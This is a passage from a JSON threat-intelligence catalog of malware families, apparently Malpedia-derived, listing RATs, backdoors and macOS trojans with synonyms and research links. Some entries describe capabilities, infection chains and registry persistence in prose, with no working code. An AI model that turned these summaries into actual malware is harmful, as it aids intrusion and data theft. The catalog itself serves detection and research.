], "type": [] }, "uuid": "9218630d-0425-4b18-802c-447a9322990d", "value": "Zollard" }, { "description": "Small downloader composed as a Fast-AutoLoad LISP (FAS) module for AutoCAD.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/fas.acad", "https://github.com/Hopfengetraenk/Fas-Disasm", "https://www.forcepoint.com/blog/security-labs/autocad-malware-computer-aided-theft" ], "synonyms": [ "Acad.Bursted", "Duxfas" ], "type": [] }, "uuid": "fb22d876-c6b5-4634-a468-5857088d605c", "value": "AutoCAD Downloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.dualtoy", "http://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/" ], "synonyms": [], "type": [] }, "uuid": "f7c1675f-b38a-4511-9ac4-6e475b3815e6", "value": "DualToy (iOS)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.guiinject", "https://sentinelone.com/blogs/analysis-ios-guiinject-adware-library/" ], "synonyms": [], "type": [] }, "uuid": "d9215579-eee0-4e50-9157-dba7c3214769", "value": "GuiInject" }, { "description": "The iOS malware that is installed over USB by osx.wirelurker", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/ios.wirelurker", "https://www.paloaltonetworks.com/content/dam/pan/en_US/assets/pdf/reports/Unit_42/unit42-wirelurker.pdf" ], "synonyms": [], "type": [] }, "uuid": "bb340271-023c-4283-9d22-123317824a11", "value": "WireLurker (iOS)" }, { "description": "Part of Malware-as-service platform\r\nUsed as a generic name for Java-based RAT\r\nFunctionality\r\n- collect general system and user information \r\n- terminate process\r\n-log keystroke\r\n-take screenshot and access webcam\r\n- steal cache password from local or web forms\r\n- download and execute Malware\r\n- modify registry\r\n- download components\r\n- Denial of Service attacks\r\n- Acquire VPN certificates\r\n\r\nInitial infection vector\r\n1. Email to JAR files attached\r\n2. Malspam URL to downlaod the malware\r\n\r\nPersistence\r\n- Runkey - HKCU\\Software\\Microsoft\\Windows\\current version\\run\r\n\r\nHiding\r\nUses attrib.exe \r\n\r\nNotes on Adwind\r\nThe malware is not known to be proxy aware", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.adwind", "https://blogs.seqrite.com/evolution-of-jrat-java-malware/", "https://www.fortinet.com/blog/threat-research/new-jrat-adwind-variant-being-spread-with-package-delivery-scam.html", "http://blog.trendmicro.com/trendlabs-security-intelligence/spam-remote-access-trojan-adwind-jrat", "http://malware-traffic-analysis.net/2017/07/04/index.html", "https://codemetrix.net/decrypting-adwind-jrat-jbifrost-trojan/", "https://gist.github.com/herrcore/8336975475e88f9bc539d94000412885", "https://blog.talosintelligence.com/2018/09/adwind-dodgesav-dde.html" ], "synonyms": [ "AlienSpy", "Frutas", "JBifrost", "JSocket", "Sockrat", "UNRECOM" ], "type": [] }, "uuid": "8eb9d4aa-257a-45eb-8c65-95c18500171c", "value": "AdWind" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.banload", "https://colin.guru/index.php?title=Advanced_Banload_Analysis", "https://www.welivesecurity.com/wp-content/uploads/2015/05/CPL-Malware-in-Brasil-zx02m.pdf", "https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?name=TrojanDownloader%3AWin32%2FBanload" ], "synonyms": [], "type": [] }, "uuid": "30a61fa9-4bd1-427d-9382-ff7c33bd7043", "value": "Banload" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.crossrat", "https://objective-see.com/blog/blog_0x28.html", "https://info.lookout.com/rs/051-ESQ-475/images/Lookout_Dark-Caracal_srr_20180118_us_v.1.0.pdf" ], "synonyms": [ "Trupto" ], "type": [] }, "uuid": "bae3a6c7-9e58-47f2-8749-a194675e1c84", "value": "CrossRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.feimea_rat", "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" ], "synonyms": [], "type": [] }, "uuid": "3724d5d0-860d-4d1e-92a1-0a7089ca2bb3", "value": "FEimea RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.javadispcash", "https://twitter.com/r3c0nst/status/1111254169623674882" ], "synonyms": [], "type": [] }, "uuid": "71286008-9794-4dcc-a571-164195390c39", "value": "JavaDispCash" }, { "description": "jRAT, also known as Jacksbot, is a RAT with history, written in Java. It has support for macOS, Linux, Windows and various BSD. It also has functionality to participate in DDoS-attacks as well as to perform click fraud. Note that the Adwind family often is mistakenly labeled as jRAT, because of of a red hering reference to jrat.io.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jrat", "https://www.intego.com/mac-security-blog/new-multiplatform-backdoor-jacksbot-discovered", "https://blog.trendmicro.com/trendlabs-security-intelligence/jacksbot-has-some-dirty-tricks-up-its-sleeves/", "https://github.com/java-rat", "https://maskop9.wordpress.com/2019/02/06/analysis-of-jacksbot-backdoor/" ], "synonyms": [ "Jacksbot" ], "type": [] }, "uuid": "f2a9f583-b4dd-4669-8808-49c8bbacc376", "value": "jRAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.jspy", "https://how-to-hack.net/hacking-guides/review-of-jspy-rat-jspy-net/" ], "synonyms": [], "type": [] }, "uuid": "ff24997d-1f17-4f00-b9b8-b3392146540f", "value": "jSpy" }, { "description": "According to SpiderLabs, in May 2015 the \"company\" Quaverse offered a RAT known as Quaverse RAT or QRAT. At around May 2016, this QRAT evolved into another RAT which became known as Qarallax RAT, because its C2 is at qarallax.com. Quaverse also offers a service to encrypt Java payloads (Qrypter), and thus qrypted payloads are sometimes confused with Quaverse RATs (QRAT / Qarallax RAT).", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qarallax_rat", "http://www.certego.net/en/news/nearly-undetectable-qarallax-rat-spreading-via-spam/", "https://labsblog.f-secure.com/2016/06/07/qarallax-rat-spying-on-us-visa-applicants/" ], "synonyms": [], "type": [] }, "uuid": "e7852eb9-9de9-43d3-9f7e-3821f3b2bf41", "value": "Qarallax RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qealler", "https://www.zscaler.com/blogs/research/qealler-new-jar-based-information-stealer" ], "synonyms": [], "type": [] }, "uuid": "d16a3a1f-e244-4715-a67f-61ba30901efb", "value": "Qealler" }, { "description": "QRat, also known as Quaverse RAT, was introduced in May 2015 as undetectable (because of multiple layers of obfuscation). It offers the usual functionality (password dumper, file browser, keylogger, screen shots/streaming, ...), and it comes as a SaaS. For additional historical context, please see jar.qarallax.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.qrat", "https://www.trustwave.com/Resources/SpiderLabs-Blog/Quaverse-RAT--Remote-Access-as-a-Service/", "https://blogs.forcepoint.com/security-labs/look-qrypter-adwind%E2%80%99s-major-rival-cross-platform-maas-market", "https://www.digitrustgroup.com/java-rat-qrat/" ], "synonyms": [ "Quaverse RAT" ], "type": [] }, "uuid": "ef385825-bfa1-4e8c-b368-522db78cf1bd", "value": "QRat" }, { "description": "Ratty is an open source Java RAT, made available on GitHub and promoted heavily on HackForums. At some point in 2016 / 2017 the original author deleted his repository, but several clones exist.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.ratty", "https://github.com/shotskeber/Ratty" ], "synonyms": [], "type": [] }, "uuid": "da032a95-b02a-4af2-b563-69f686653af4", "value": "Ratty" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/jar.supremebot", "https://dfir.it/blog/2019/02/26/the-supreme-backdoor-factory/" ], "synonyms": [ "BlazeBot" ], "type": [] }, "uuid": "651e37e0-1bf8-4024-ac1e-e7bda42470b0", "value": "SupremeBot" }, { "description": "AIRBREAK, a JavaScript-based backdoor which retrieves commands from hidden strings in compromised webpages.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.airbreak", "https://www.fireeye.com/blog/threat-research/2018/07/chinese-espionage-group-targets-cambodia-ahead-of-elections.html" ], "synonyms": [ "Orz" ], "type": [] }, "uuid": "fd419da6-5c0d-461e-96ee-64397efac63b", "value": "AIRBREAK" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bateleur", "https://www.proofpoint.com/us/threat-insight/post/fin7carbanak-threat-actor-unleashes-bateleur-jscript-backdoor" ], "synonyms": [], "type": [] }, "uuid": "fb75a753-24ba-4b58-b7ed-2e39b0c68c65", "value": "Bateleur" }, { "description": "• BELLHOP is\ta JavaScript backdoor interpreted using the native Windows Scripting Host(WSH).\r\nAfter performing some basic host information gathering, the BELLHOP dropper\tdownloads a base64-encoded blob of JavaScript to disk and\tsets\tup persistence in three ways:\r\n• Creating a Run key in the Registry\r\n• Creating a RunOnce key in the Registry\r\n• Creating a persistent named scheduled task\r\n• BELLHOP communicates using HTTP\tand HTTPS with primarily benign sites such as Google\tDocs and PasteBin.\r\n", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.bellhop", "https://www.fireeye.com/blog/threat-research/2018/08/fin7-pursuing-an-enigmatic-and-evasive-global-criminal-operation.html" ], "synonyms": [], "type": [] }, "uuid": "7ebeb691-b979-4a88-94e1-dade780c6a7f", "value": "BELLHOP" }, { "description": "According to the GitHub repo, CACTUSTORCH is a JavaScript and VBScript shellcode launcher. It will spawn a 32 bit version of the binary specified and inject shellcode into it.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cactustorch", "https://www.codercto.com/a/46729.html", "https://github.com/mdsecactivebreach/CACTUSTORCH" ], "synonyms": [], "type": [] }, "uuid": "efbb5a7c-8c01-4aca-ac21-8dd614b256f7", "value": "CACTUSTORCH" }, { "description": "WebAssembly-based crpyto miner.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cryptonight", "https://gist.github.com/JohnLaTwC/112483eb9aed27dd2184966711c722ec", "https://twitter.com/JohnLaTwC/status/983011262731714565" ], "synonyms": [], "type": [] }, "uuid": "faa19699-a884-4cd3-a307-36492c8ee77a", "value": "CryptoNight" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.cukiegrab_crx", "http://blog.trendmicro.com/trendlabs-security-intelligence/malicous-chrome-extensions-stealing-roblox-game-currency-sending-cookies-via-discord/" ], "synonyms": [ "Roblox Trade Assist" ], "type": [] }, "uuid": "d47ca107-3e03-4c25-88f9-8156426b7f60", "value": "CukieGrab" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.dnsrat", "https://www.flashpoint-intel.com/blog/fin7-revisited:-inside-astra-panel-and-sqlrat-malware/" ], "synonyms": [ "DNSbot" ], "type": [] }, "uuid": "a4b40d48-e40b-47f2-8e30-72342231503e", "value": "DNSRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.evilnum", "https://unit42.paloaltonetworks.com/cardinal-rat-sins-again-targets-israeli-fin-tech-firms/", "http://www.pwncode.club/2018/05/javascript-based-bot-using-github-c.html" ], "synonyms": [], "type": [] }, "uuid": "b7deec7e-24f7-4f78-9d58-9b3c1e182ab3", "value": "EVILNUM (Javascript)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.griffon", "https://twitter.com/ItsReallyNick/status/1059898708286939136" ], "synonyms": [], "type": [] }, "uuid": "85c25380-69d7-4d7e-b279-6b6791fd40bd", "value": "Griffon" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.kopiluwak", "https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiluwak-javascript-backdoor-use-g20-themed-attack", "https://securelist.com/shedding-skin-turlas-fresh-faces/88069/", "https://securelist.com/blog/research/77429/kopiluwak-a-new-javascript-payload-from-turla/" ], "synonyms": [], "type": [] }, "uuid": "2269d37b-87e9-460d-b878-b74a2f4c3537", "value": "KopiLuwak" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.magecart", "https://www.riskiq.com/blog/labs/magecart-group-4-always-advancing/", "https://www.riskiq.com/blog/labs/magecart-ticketmaster-breach/", "https://www.crowdstrike.com/blog/threat-actor-magecart-coming-to-an-ecommerce-store-near-you/" ], "synonyms": [], "type": [] }, "uuid": "f53e404b-0dcd-4116-91dd-cad94fc41936", "value": "magecart" }, { "description": "More_eggs is a JavaScript backdoor used by the Cobalt group. It attempts to connect to its C&C server and retrieve tasks to carry out, some of which are:\r\n- d&exec = download and execute PE file\r\n- gtfo = delete files/startup entries and terminate\r\n- more_eggs = download additional/new scripts\r\n- more_onion = run new script and terminate current script\r\n- more_power = run command shell commands", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.more_eggs", "https://blog.trendmicro.com/trendlabs-security-intelligence/backdoor-carrying-emails-set-sights-on-russian-speaking-businesses/", "https://reaqta.com/2018/03/spear-phishing-campaign-leveraging-msxsl/", "https://www.secureworks.com/blog/cybercriminals-increasingly-trying-to-ensnare-the-big-financial-fish", "https://blog.trendmicro.com/trendlabs-security-intelligence/cobalt-spam-runs-use-macros-cve-2017-8759-exploit/", "https://blog.talosintelligence.com/2018/07/multiple-cobalt-personality-disorder.html", "https://www.proofpoint.com/us/threat-insight/post/fake-jobs-campaigns-delivering-moreeggs-backdoor-fake-job-offers", "https://asert.arbornetworks.com/double-the-infection-double-the-fun/", "https://blog.morphisec.com/cobalt-gang-2.0" ], "synonyms": [ "SpicyOmelette" ], "type": [] }, "uuid": "1c3009ff-b9a5-4ac1-859c-9b3b4a66a63f", "value": "More_eggs" }, { "description": "NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.nanhaishu", "https://community.spiceworks.com/topic/1028936-stealthy-cyberespionage-campaign-attacks-with-social-engineering", "https://attack.mitre.org/software/S0228/", "https://www.proofpoint.com/us/threat-insight/post/leviathan-espionage-actor-spearphishes-maritime-and-defense-targets", "https://www.f-secure.com/documents/996508/1030745/nanhaishu_whitepaper.pdf" ], "synonyms": [], "type": [] }, "uuid": "3e46af39-52e8-442f-aff1-38eeb90336fc", "value": "NanHaiShu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.powmet", "http://blog.trendmicro.com/trendlabs-security-intelligence/look-js_powmet-completely-fileless-malware/" ], "synonyms": [], "type": [] }, "uuid": "9521ceb0-039d-412c-a38b-7bd9ddfc772e", "value": "Powmet" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.scanbox", "https://www.alienvault.com/blogs/labs-research/scanbox-a-reconnaissance-framework-used-on-watering-hole-attacks", "http://resources.infosecinstitute.com/scanbox-framework/" ], "synonyms": [], "type": [] }, "uuid": "0a13a546-91a2-4de0-9bbb-71c9233ce6fa", "value": "scanbox" }, { "description": "SQLRat campaigns typically involve a lure document that includes an image overlayed by a VB Form trigger. Once a user has double-clicked the embedded image, the form executes a VB setup script. The script writes files to the path %appdata%\\Roaming\\Microsoft\\Templates\\, then creates two task entries triggered to run daily. The scripts are responsible for deobfuscating and executing the main JavaScript file mspromo.dot. The file uses a character insertion obfuscation technique, making it appear to contain Chinese characters. After deobfuscating the file, the main JavaScript is easily recognizable. It contains a number of functions designed to drop files and execute scripts on a host system. The SQLRat script is designed to make a direct SQL connection to a Microsoft database controlled by the attackers and execute the contents of various tables.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.sqlrat", "https://www.flashpoint-intel.com/blog/fin7-revisited-inside-astra-panel-and-sqlrat-malware/" ], "synonyms": [], "type": [] }, "uuid": "d51cb8f8-cca3-46ce-a05d-052df44aef40", "value": "SQLRat" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_ff_ext", "https://www.welivesecurity.com/2017/06/06/turlas-watering-hole-campaign-updated-firefox-extension-abusing-instagram/" ], "synonyms": [], "type": [] }, "uuid": "c7ab9e5a-0ec9-481e-95ec-ad08f06cf985", "value": "HTML5 Encoding" }, { "description": "Expects a parameter to run: needs to be started as 'maintools.js EzZETcSXyKAdF_e5I2i1'.", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.turla_maintools", "https://twitter.com/JohnLaTwC/status/915590893155098629" ], "synonyms": [], "type": [] }, "uuid": "218f8ca8-1124-4e44-8fbd-4b05b46bde4b", "value": "Maintools.js" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.unidentified_050", "https://community.riskiq.com/projects/53b4bd1e-dad0-306b-7712-d2a608400c8f", "https://gist.github.com/9b/141a5c7ab8b4280901722e2cd931b7ef" ], "synonyms": [], "type": [] }, "uuid": "f2b0ffdc-7d4e-4786-8935-e7036faa174d", "value": "Unidentified 050 (APT32 Profiler)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/js.witchcoven", "https://www2.fireeye.com/rs/848-DID-242/images/rpt-witchcoven.pdf" ], "synonyms": [], "type": [] }, "uuid": "dcc0fad2-29a9-4b69-9d75-d288ca458bc7", "value": "witchcoven" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.applejeus", "https://securelist.com/operation-applejeus/87553/" ], "synonyms": [], "type": [] }, "uuid": "ca466f15-8e0a-4030-82cb-5382e3c56ee5", "value": "AppleJeus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.bella", "https://github.com/kai5263499/Bella", "https://blog.malwarebytes.com/threat-analysis/2017/05/another-osx-dok-dropper-found-installing-new-backdoor/" ], "synonyms": [], "type": [] }, "uuid": "3c5036ad-2afc-4bc1-a5a3-b31797f46248", "value": "Bella" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.careto", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [ "Appetite", "Mask" ], "type": [] }, "uuid": "dcabea75-a433-4157-bb7a-be76de3026ac", "value": "Careto" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cointhief", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed" ], "synonyms": [], "type": [] }, "uuid": "70e73da7-21d3-4bd6-9a0e-0c904e6457e8", "value": "CoinThief" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.coldroot_rat", "https://objective-see.com/blog/blog_0x2A.html" ], "synonyms": [], "type": [] }, "uuid": "076a7ae0-f4b8-45c7-9de4-dc9cc7e54bcf", "value": "Coldroot RAT" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.cpumeaner", "https://www.sentinelone.com/blog/osx-cpumeaner-miner-trojan-software-pirates/" ], "synonyms": [], "type": [] }, "uuid": "74360d1e-8f85-44d1-8ce7-e76afb652142", "value": "CpuMeaner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.creative_updater", "https://blog.malwarebytes.com/threat-analysis/2018/02/new-mac-cryptominer-distributed-via-a-macupdate-hack/", "https://objective-see.com/blog/blog_0x29.html", "https://digitasecurity.com/blog/2018/02/05/creativeupdater/" ], "synonyms": [], "type": [] }, "uuid": "40fc6f71-75ac-43ac-abd9-c90b0e847999", "value": "CreativeUpdater" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crisis", "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?", "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines" ], "synonyms": [], "type": [] }, "uuid": "2bb6c494-8057-4d83-9202-fda3284deee4", "value": "Crisis (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.crossrider", "https://blog.malwarebytes.com/threat-analysis/2018/04/new-crossrider-variant-installs-configuration-profiles-on-macs/?utm_source=twitter&utm_medium=social" ], "synonyms": [], "type": [] }, "uuid": "05ddb459-5a2f-44d5-a135-ed3f1e772302", "value": "Crossrider" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.darthminer", "https://blog.malwarebytes.com/threat-analysis/2018/12/mac-malware-combines-empyre-backdoor-and-xmrig-miner/" ], "synonyms": [], "type": [] }, "uuid": "a8e71805-014d-4998-b21e-3125da800124", "value": "DarthMiner" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dockster", "http://contagiodump.blogspot.com/2012/12/osxdockstera-and-win32trojanagentaxmo.html", "https://www.f-secure.com/weblog/archives/00002466.html" ], "synonyms": [], "type": [] }, "uuid": "713d8ec4-4983-4fbb-827c-2ef5bc0e6930", "value": "Dockster" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.dummy", "https://objective-see.com/blog/blog_0x32.html" ], "synonyms": [], "type": [] }, "uuid": "cbf9ff89-d35b-4954-8873-32f59f5e4d7d", "value": "Dummy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.eleanor", "https://labs.bitdefender.com/2016/07/new-mac-backdoor-nukes-os-x-systems/" ], "synonyms": [], "type": [] }, "uuid": "c221e519-fe3e-416e-bc63-a2246b860958", "value": "Eleanor" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.evilosx", "https://github.com/Marten4n6/EvilOSX", "https://twitter.com/JohnLaTwC/status/966139336436498432" ], "synonyms": [], "type": [] }, "uuid": "24f3d8e1-3936-4664-b813-74c797b87d9d", "value": "EvilOSX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.failytale", "https://www.sentinelone.com/blog/trail-osx-fairytale-adware-playing-malware/" ], "synonyms": [], "type": [] }, "uuid": "5dfd704c-a69d-4e93-bd70-68f89fbbb32c", "value": "FailyTale" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.flashback", "http://contagiodump.blogspot.com/2012/04/osxflashbacko-sample-some-domains.html", "https://www.alienvault.com/blogs/labs-research/os-x-malware-samples-analyzed", "http://contagiodump.blogspot.com/2012/04/osxflashbackk-sample-mac-os-malware.html" ], "synonyms": [], "type": [] }, "uuid": "f92b5355-f398-4f09-8bcc-e06df6fe51a0", "value": "FlashBack" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.fruitfly", "https://www.documentcloud.org/documents/4346338-Phillip-Durachinsky-Indictment.html", "https://blog.malwarebytes.com/threat-analysis/2017/01/new-mac-backdoor-using-antiquated-code/", "https://arstechnica.com/security/2017/07/perverse-malware-infecting-hundreds-of-macs-remained-undetected-for-years/", "https://www.virusbulletin.com/virusbulletin/2017/11/vb2017-paper-offensive-malware-analysis-dissecting-osxfruitflyb-custom-cc-server/", "https://arstechnica.com/security/2017/01/newly-discovered-mac-malware-may-have-circulated-in-the-wild-for-2-years/", "https://media.defcon.org/DEF%20CON%2025/DEF%20CON%2025%20presentations/DEFCON-25-Patrick-Wardle-Offensive-Malware-Analysis-Fruit-Fly-UPDATED..pdf" ], "synonyms": [ "Quimitchin" ], "type": [] }, "uuid": "a517cdd1-6c82-4b29-bdd2-87e281227597", "value": "FruitFly" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.hiddenlotus", "https://blog.malwarebytes.com/threat-analysis/2017/12/interesting-disguise-employed-by-new-mac-malware/" ], "synonyms": [], "type": [] }, "uuid": "fc17e41f-e9f7-4442-a05c-7a19b9174c39", "value": "HiddenLotus" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.imuler", "http://contagiodump.blogspot.com/2012/11/group-photoszip-osxrevir-osximuler.html", "https://nakedsecurity.sophos.com/2012/11/13/new-mac-trojan/" ], "synonyms": [ "Revir" ], "type": [] }, "uuid": "261fd543-60e4-470f-af28-7a9b17ba4759", "value": "iMuler" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keranger", "https://objective-see.com/blog/blog_0x16.html", "https://www.macworld.com/article/3234650/macs/keranger-the-first-in-the-wild-ransomware-for-macs-but-certainly-not-the-last.html", "http://researchcenter.paloaltonetworks.com/2016/03/new-os-x-ransomware-keranger-infected-transmission-bittorrent-client-installer/" ], "synonyms": [], "type": [] }, "uuid": "01643bc9-bd61-42e8-b9f1-5fbf83dcd786", "value": "KeRanger" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.keydnap", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/2016/07/06/new-osxkeydnap-malware-hungry-credentials/", "https://github.com/eset/malware-ioc/tree/master/keydnap" ], "synonyms": [], "type": [] }, "uuid": "2173605b-bf44-4c76-b75a-09c53bb322d6", "value": "Keydnap" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.kitmos", "https://www.f-secure.com/weblog/archives/00002558.html" ], "synonyms": [ "KitM" ], "type": [] }, "uuid": "8a1b1c99-c149-4339-9058-db3b4084cdcd", "value": "Kitmos" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.komplex", "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", "https://objective-see.com/blog/blog_0x16.html", "http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part1.pdf", "http://researchcenter.paloaltonetworks.com/2016/09/unit42-sofacys-komplex-os-x-trojan/", "https://blog.malwarebytes.com/threat-analysis/2016/09/komplex-mac-backdoor-answers-old-questions/" ], "synonyms": [ "JHUHUGIT", "JKEYSKW", "SedUploader" ], "type": [] }, "uuid": "d26b5518-8d7f-41a6-b539-231e4962853e", "value": "Komplex" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.laoshu", "https://objective-see.com/blog/blog_0x16.html", "https://nakedsecurity.sophos.com/2014/01/21/data-stealing-malware-targets-mac-users-in-undelivered-courier-item-attack/" ], "synonyms": [], "type": [] }, "uuid": "a13a2cb8-b0e6-483a-9916-f44969a2c42b", "value": "Laoshu" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.leverage", "https://www.alienvault.com/blogs/labs-research/osx-leveragea-analysis", "https://www.volexity.com/blog/2017/07/24/real-news-fake-flash-mac-os-x-users-targeted/" ], "synonyms": [], "type": [] }, "uuid": "15daa766-f721-4fd5-95fb-153f5361fb87", "value": "Leverage" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macdownloader", "https://iranthreats.github.io/resources/macdownloader-macos-malware/" ], "synonyms": [], "type": [] }, "uuid": "910d3c78-1a9e-4600-a3ea-4aa5563f0f13", "value": "MacDownloader" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macinstaller", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "d1f8af3c-719b-4f64-961b-8d89a2defa02", "value": "MacInstaller" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macransom", "https://objective-see.com/blog/blog_0x1E.html", "https://blog.fortinet.com/2017/06/09/macransom-offered-as-ransomware-as-a-service" ], "synonyms": [], "type": [] }, "uuid": "66862f1a-5823-4a9a-bd80-439aaafc1d8b", "value": "MacRansom" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macspy", "https://www.alienvault.com/blogs/labs-research/macspy-os-x-rat-as-a-service" ], "synonyms": [], "type": [] }, "uuid": "c9915d41-d1fb-45bc-997e-5cd9c573d8e7", "value": "MacSpy" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.macvx", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "4db9012b-d3a1-4f19-935c-4dbc7fdd93fe", "value": "MacVX" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mami", "https://objective-see.com/blog/blog_0x26.html" ], "synonyms": [], "type": [] }, "uuid": "7759534c-3298-42e9-adab-896d7e507f4f", "value": "MaMi" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mokes", "https://securelist.com/blog/research/75990/the-missing-piece-sophisticated-os-x-backdoor-discovered/", "https://objective-see.com/blog/blog_0x16.html" ], "synonyms": [], "type": [] }, "uuid": "bfbb6e5a-32dc-4842-936c-5d8497570c74", "value": "Mokes (OS X)" }, { "description": "", "meta": { "refs": [ "https://malpedia.caad.fkie.fraunhofer.de/details/osx.mughthesec", "https://objective-see.com/blog/blog_0x20.html" ], "synonyms": [], "type": [] }, "uuid": "aa1bf4e5-9c44-42a2-84e5-7526e4349405", "value": "Mughthesec" }, { "description": "", 